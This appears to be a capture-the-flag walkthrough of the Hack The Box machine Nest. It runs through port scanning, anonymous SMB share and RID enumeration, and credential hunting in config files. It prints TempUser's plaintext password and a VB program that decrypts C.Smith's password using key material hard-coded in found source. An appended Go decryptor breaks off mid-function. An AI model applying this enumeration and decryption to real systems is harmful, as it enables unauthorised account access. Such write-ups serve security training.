Nest



Nest01.png

Port scan

u505@naos:~/HTB/Machines/Nest$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.178
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-12-27 13:46:38 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4386/tcp on 10.10.10.178
Discovered open port 445/tcp on 10.10.10.178
u505@naos:~/HTB/Machines/Nest$ nmap -sC -sV 10.10.10.178
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:46 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.39 seconds

Nmap thinks the machine is down because its host-discovery probes get no answer. We can skip host discovery and force the scan with the -Pn option.

u505@naos:~/HTB/Machines/Nest$ nmap -Pn -sC -sV nest
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:47 EST
Nmap scan report for nest (10.10.10.178)
Host is up (0.038s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

Host script results:
|_clock-skew: 8m02s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-27T13:56:20
|_  start_date: 2020-12-27T13:49:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.92 seconds

An alternative to the -Pn switch is to run nmap as root, which enables ICMP echo probes during host discovery.

Nest02.png

As an unprivileged user, nmap's host discovery only sends TCP probes to ports 80 and 443, and the server does not answer them (probably dropped by a firewall). When the scan is launched with sudo, nmap also sends an ICMP echo request, which this host answers.

Nest03.png

u505@naos:~/HTB/Machines/Nest$ sudo nmap -sC -sV 10.10.10.178
[sudo] password for u505:
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:47 EST
Nmap scan report for nest (10.10.10.178)
Host is up (0.038s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

Host script results:
|_clock-skew: 8m02s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-27T13:56:05
|_  start_date: 2020-12-27T13:49:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.52 seconds
u505@naos:~/HTB/Machines/Nest$ sudo nmap -p 445,4386 -sC -sV 10.10.10.178
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 09:01 EST
Nmap scan report for nest (10.10.10.178)
Host is up (0.038s latency).

PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     HQK Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HQK Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     HQK Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     --- AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.91%I=7%D=12/27%Time=5FE893C3%P=x86_64-pc-linux-gnu%r(N
SF:ULL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLi
SF:nes,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognis
SF:ed\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x
SF:20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comm
SF:and\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Rep
SF:orting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQ
SF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows
SF:\x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20t
SF:he\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20--
SF:-\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r
SF:\nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCook
SF:ie,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSession
SF:Req,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,
SF:21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3
SF:A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x2
SF:0command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\
SF:.2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x
SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>");

Host script results:
|_clock-skew: 8m02s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-27T14:12:15
|_  start_date: 2020-12-27T13:49:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.13 seconds

Port 4386 appears to run a custom, hand-written service.

u505@naos:~/HTB/Machines/Nest$ telnet nest 4386
Trying 10.10.10.178...
Connected to nest.
Escape character is '^]'.

HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>quit
Was it something I said?
Connection closed by foreign host.

Windows shares enumeration

Unauthenticated enumeration

Shares

u505@naos:~/HTB/Machines/Nest$ smbmap -H 10.10.10.178
[+] IP: 10.10.10.178:445        Name: nest
u505@naos:~/HTB/Machines/Nest$ smbmap -u anonymous -H 10.10.10.178
[+] Guest session       IP: 10.10.10.178:445    Name: nest                      
        Disk                                                    Permissions    Comment
        ----                                                    -----------    -------
        ADMIN$                                                  NO ACCESS      Remote Admin
        C$                                                      NO ACCESS      Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS      Remote IPC
        Secure$                                                 NO ACCESS
        Users                                                   READ ONLY

Two shares, Data and Users, are readable without authentication.

u505@naos:~/HTB/Machines/Nest$ enum4linux 10.10.10.178

Enum4linux doesn't provide any useful information.

u505@naos:~/HTB/Machines/Nest$ crackmapexec smb 10.10.10.178/32
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)

Windows 6.1 build 7601 corresponds to Windows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1.

u505@naos:~/HTB/Machines/Nest$ sudo crackmapexec smb 10.10.10.178/32 -u 'u505' -p abc --shares
[sudo] password for u505:
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\u505:abc
SMB         10.10.10.178    445    HTB-NEST         [+] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$
SMB         10.10.10.178    445    HTB-NEST         Users           READ

crackmapexec reports the same share information.

Users

u505@naos:~/HTB/Machines/Nest$ python3 /opt/utils/impacket/examples/lookupsid.py u505:abc@10.10.10.178
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.178
[*] StringBinding ncacn_np:10.10.10.178[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3904039239-3573887098-1598508871
500: HTB-NEST\Administrator (SidTypeUser)
501: HTB-NEST\Guest (SidTypeUser)
513: HTB-NEST\None (SidTypeGroup)
1002: HTB-NEST\TempUser (SidTypeUser)
1004: HTB-NEST\C.Smith (SidTypeUser)
1005: HTB-NEST\Service_HQK (SidTypeUser)

Three regular users (TempUser, C.Smith and Service_HQK) are enumerated, along with the built-in Administrator and Guest accounts.

u505@naos:~/HTB/Machines/Nest$ crackmapexec smb 10.10.10.178/32 -u 'u505' -p abc --rid-brute
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\u505:abc
SMB         10.10.10.178    445    HTB-NEST         [+] Brute forcing RIDs
SMB         10.10.10.178    445    HTB-NEST         500: HTB-NEST\Administrator (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         501: HTB-NEST\Guest (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         513: HTB-NEST\None (SidTypeGroup)
SMB         10.10.10.178    445    HTB-NEST         1002: HTB-NEST\TempUser (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         1004: HTB-NEST\C.Smith (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         1005: HTB-NEST\Service_HQK (SidTypeUser)

Crackmapexec provides the same information.

Files enumeration

Mount shares

u505@naos:~/HTB/Machines/Nest$ mkdir -p mnt/data mnt/secure mnt/users
u505@naos:~/HTB/Machines/Nest$ cd mnt/
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data
🔐 Password for root@//10.10.10.178/data:  *****
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users
🔐 Password for root@//10.10.10.178/users:  *****

Search accessible files

u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: ‘./data/IT’: Permission denied
find: ‘./data/Production’: Permission denied
find: ‘./data/Reports’: Permission denied
-rwxr-xr-x 1 root root 48 Aug  5  2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug  7  2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: ‘./users/Administrator’: Permission denied
find: ‘./users/C.Smith’: Permission denied
find: ‘./users/L.Frost’: Permission denied
find: ‘./users/R.Thompson’: Permission denied
find: ‘./users/TempUser’: Permission denied
u505@naos:~/HTB/Machines/Nest/mnt$ cat "./data/Shared/Maintenance/Maintenance Alerts.txt"
There is currently no scheduled maintenance work

The second file contains what look like credentials for the user TempUser.

u505@naos:~/HTB/Machines/Nest/mnt$ cat "./data/Shared/Templates/HR/Welcome Email.txt"
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019

Thank you HR

Enumeration with user TempUser

Shares

u505@naos:~/HTB/Machines/Nest/mnt$ smbmap -u TempUser -p welcome2019 -H 10.10.10.178
[+] IP: 10.10.10.178:445        Name: nest
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 READ ONLY
        Users                                                   READ ONLY

With the TempUser credentials, the hidden share Secure$ becomes readable.

u505@naos:~/HTB/Machines/Nest/mnt$ sudo crackmapexec smb 10.10.10.178/32 -u TempUser -p welcome2019 --shares
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\TempUser:welcome2019
SMB         10.10.10.178    445    HTB-NEST         [+] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$         READ
SMB         10.10.10.178    445    HTB-NEST         Users           READ

Crackmapexec provides the same information.

Files enumeration

Unmount unauthenticated shares.

u505@naos:~/HTB/Machines/Nest/mnt$ sudo umount data users

Mount shares with TempUser

u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/secure$ secure -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: ‘./secure/Finance’: Permission denied
find: ‘./secure/HR’: Permission denied
find: ‘./secure/IT’: Permission denied
-rwxr-xr-x 1 root root 246 Aug  3  2019 ./data/IT/Configs/Adobe/editing.xml
-rwxr-xr-x 1 root root 0 Oct 10  2011 ./data/IT/Configs/Adobe/Options.txt
-rwxr-xr-x 1 root root 258 Jan  8  2013 ./data/IT/Configs/Adobe/projects.xml
-rwxr-xr-x 1 root root 1274 Aug  7  2019 ./data/IT/Configs/Adobe/settings.xml
-rwxr-xr-x 1 root root 1369 Jun 11  2003 ./data/IT/Configs/Atlas/Temp.XML
-rwxr-xr-x 1 root root 4598 Mar  3  2012 ./data/IT/Configs/Microsoft/Options.xml
-rwxr-xr-x 1 root root 6451 Aug  7  2019 ./data/IT/Configs/NotepadPlusPlus/config.xml
-rwxr-xr-x 1 root root 2108 Aug  7  2019 ./data/IT/Configs/NotepadPlusPlus/shortcuts.xml
-rwxr-xr-x 1 root root 270 Aug  8  2019 './data/IT/Configs/RU Scanner/RU_config.xml'
-rwxr-xr-x 1 root root 48 Aug  5  2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug  7  2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: ‘./users/Administrator’: Permission denied
find: ‘./users/C.Smith’: Permission denied
find: ‘./users/L.Frost’: Permission denied
find: ‘./users/R.Thompson’: Permission denied
-rwxr-xr-x 1 root root 0 Aug  7  2019 './users/TempUser/New Text Document.txt'

In the Notepad++ config file, the recent-file history references a file in the IT\Carl folder of the Secure$ share.

u505@naos:~/HTB/Machines/Nest/mnt$ tail ./data/IT/Configs/NotepadPlusPlus/config.xml
        <Find name="redeem on" />
        <Find name="192" />
        <Replace name="C_addEvent" />
    </FindHistory>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>

There is also a file RU_config.xml that seems to contain the credentials of c.smith for an LDAP service on port 389 (Active Directory?).

u505@naos:~/HTB/Machines/Nest/mnt$ cat './data/IT/Configs/RU Scanner/RU_config.xml'
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

But the password is not simply encoded: decoding the base64 yields 32 bytes of binary data, so it is encrypted.

u505@naos:~/HTB/Machines/Nest/mnt$ echo fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= | base64 -d | xxd
00000000: 7d31 3301 f603 a33d 58ce 4aa1 4241 fa19  }13....=X.J.BA..
00000010: 0158 2a9d 5763 9866 edb8 ce3f ceb2 6311  .X*.Wc.f...?..c.

Listing the IT folder of Secure$ raises a permission denied error, but the subfolder Carl named in the Notepad++ history is accessible directly: the permissions deny listing the parent but not traversing into the child.

u505@naos:~/HTB/Machines/Nest/mnt$ cd secure/IT/Carl
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ find . -type f -exec ls -l {} \;
-rwxr-xr-x 1 root root 56 Aug  7  2019 ./Docs/ip.txt
-rwxr-xr-x 1 root root 73 Aug  7  2019 ./Docs/mmc.txt
-rwxr-xr-x 1 root root 772 Aug  7  2019 './VB Projects/WIP/RU/RUScanner/ConfigFile.vb'
-rwxr-xr-x 1 root root 279 Aug  7  2019 './VB Projects/WIP/RU/RUScanner/Module1.vb'
-rwxr-xr-x 1 root root 441 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb'
-rwxr-xr-x 1 root root 481 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Application.myapp'
-rwxr-xr-x 1 root root 1163 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb'
-rwxr-xr-x 1 root root 2776 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb'
-rwxr-xr-x 1 root root 5612 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Resources.resx'
-rwxr-xr-x 1 root root 2989 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb'
-rwxr-xr-x 1 root root 279 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Settings.settings'
-rwxr-xr-x 1 root root 4828 Aug  9  2019 './VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj'
-rwxr-xr-x 1 root root 143 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user'
-rwxr-xr-x 1 root root 133 Aug  7  2019 './VB Projects/WIP/RU/RUScanner/SsoIntegration.vb'
-rwxr-xr-x 1 root root 4888 Aug  7  2019 './VB Projects/WIP/RU/RUScanner/Utils.vb'
-rwxr-xr-x 1 root root 871 Aug  6  2019 './VB Projects/WIP/RU/RUScanner.sln'

The file Utils.vb contains the encryption and decryption routines, with the passphrase, salt, iteration count and initialisation vector hard-coded in the source.

u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ cat './VB Projects/WIP/RU/RUScanner/Utils.vb'
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                                   encryptor, _
                                                   CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

End Class

User Flag

Create a VB program to decrypt the password

Dotnet environment variables

u505@naos:/opt/utils/dotnet$ export DOTNET_ROOT=/opt/utils/dotnet
u505@naos:/opt/utils/dotnet$ export PATH=$PATH:$DOTNET_ROOT

Creation of a console VB project.

u505@naos:~/HTB/Machines/Nest$ mkdir VBu505
u505@naos:~/HTB/Machines/Nest$ cd VBu505
u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet new console -lang vb
The template "Console Application" was created successfully.

Processing post-creation actions...
Running 'dotnet restore' on /opt/HTB/Machines/Nest/VBu505/VBu505.vbproj...
  Determining projects to restore...
  Restored /opt/HTB/Machines/Nest/VBu505/VBu505.vbproj (in 131 ms).
Restore succeeded.

An update for template pack Microsoft.DotNet.Common.ProjectTemplates.3.1::3.1.10 is available. install command: dotnet new -i Microsoft.DotNet.Common.ProjectTemplates.3.1::5.0.0

Inspired by the source code found previously, I created a decrypt function to decrypt the password.

u505@naos:~/HTB/Machines/Nest/VBu505$ cat Program.vb
Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        Return plainText
    End Function

End Class

Module Program
    Sub Main(args As String())
        Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
    End Sub
End Module

We run the VB program.

u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet run
xRxRxPANCAK3SxRxRx
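The same decryption carried out in Go, as an added example that is not part of the original page nor of the RU Scanner project. It assumes what the .NET classes in Utils.vb do by default: Rfc2898DeriveBytes is PBKDF2 with HMAC-SHA1, and AesCryptoServiceProvider in CBC mode applies PKCS#7 padding. PBKDF2 is written out by hand so that only the Go standard library is needed; the names HqkDecrypt and DecryptRUConfigPassword are my own. The point for a defender is that, because the passphrase, salt, iteration count and IV are constants in source that sat on a readable share, the "encrypted" value in RU_config.xml is recoverable by anyone who can read both files; encryption with key material stored next to the ciphertext is obfuscation, not protection.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

// pbkdf2SHA1 derives keyLen bytes from password and salt with PBKDF2-HMAC-SHA1
// (RFC 2898 section 5.2), the PRF that Rfc2898DeriveBytes uses by default.
func pbkdf2SHA1(password, salt []byte, iterations, keyLen int) []byte {
	prf := hmac.New(sha1.New, password)
	hashLen := prf.Size()
	numBlocks := (keyLen + hashLen - 1) / hashLen
	out := make([]byte, 0, numBlocks*hashLen)
	var blockIndex [4]byte
	for i := 1; i <= numBlocks; i++ {
		// U1 = PRF(P, S || INT(i)), big-endian block index
		binary.BigEndian.PutUint32(blockIndex[:], uint32(i))
		prf.Reset()
		prf.Write(salt)
		prf.Write(blockIndex[:])
		u := prf.Sum(nil)
		t := make([]byte, hashLen)
		copy(t, u)
		// Uj = PRF(P, Uj-1); T = U1 xor U2 xor ... xor Uc
		for j := 1; j < iterations; j++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for k := range t {
				t[k] ^= u[k]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// HqkDecrypt mirrors the signature of Utils.Decrypt from the RU Scanner source:
// base64 ciphertext, PBKDF2-derived key, AES-CBC with an ASCII IV, PKCS#7 padding.
func HqkDecrypt(cipherB64, passPhrase, salt string, iterations int, initVector string, keyBits int) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(cipherB64)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	iv := []byte(initVector)
	if len(iv) != aes.BlockSize {
		return "", errors.New("IV must be exactly 16 bytes")
	}
	key := pbkdf2SHA1([]byte(passPhrase), []byte(salt), iterations, keyBits/8)
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
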